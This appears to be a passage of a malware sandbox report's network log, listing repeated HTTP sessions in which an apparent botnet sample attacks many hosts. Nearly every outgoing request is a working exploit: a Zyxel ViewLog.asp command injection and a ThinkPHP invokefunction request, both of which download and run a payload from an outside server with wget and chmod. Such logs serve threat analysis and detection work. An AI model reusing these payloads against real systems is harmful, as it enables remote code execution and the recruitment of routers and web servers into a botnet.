                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            171192.168.2.234053031.136.178.2508080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.938226938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:12.577697039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:13.825578928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:16.321098089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:21.440371990 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:31.422960997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:51.388184071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:32.342525005 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            172192.168.2.235338295.43.223.808080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.965249062 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            173192.168.2.235332094.110.187.638080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:11.982820034 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            174192.168.2.233594295.139.179.1398080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:12.017309904 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:12.270602942 CET21INHTTP/1.1
                                                            Data Raw:
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            175192.168.2.234188262.29.91.708080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:12.019978046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            176192.168.2.233967031.200.3.2068080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:12.020519972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            177192.168.2.234691831.200.58.448080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:12.021863937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            178192.168.2.2353996112.165.90.23580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:12.112287045 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:12.384457111 CET512INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 17:37:33 GMT
                                                            Server: lighttpd/1.4.55
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            179192.168.2.2354018112.165.90.23580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:13.671603918 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:13.951906919 CET512INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 17:37:36 GMT
                                                            Server: lighttpd/1.4.55
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            180192.168.2.235966495.154.252.12680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:13.866266966 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:14.060900927 CET511INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:13 GMT
                                                            Server: Apache/2.4.38 (Debian)
                                                            Content-Length: 317
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 61 72 62 64 33 34 34 2e 65 61 73 79 76 73 65 72 76 65 72 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at starbd344.easyvserver.com Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            181192.168.2.235832295.179.188.23980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:13.876981020 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:14.083451986 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.20.1
                                                            Date: Wed, 14 Feb 2024 08:28:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            182192.168.2.235198288.221.70.22880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.073183060 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:14.268204927 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:28:14 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:14 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 37 35 61 33 33 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 32 39 34 26 23 34 36 3b 39 33 32 38 64 39 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a75a33b8&#46;1707899294&#46;9328d91</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            183192.168.2.233945488.208.215.21580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.075149059 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:14.272404909 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:14 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            184192.168.2.234522288.99.249.25480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:14.083074093 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:14.288383007 CET322INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:14 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


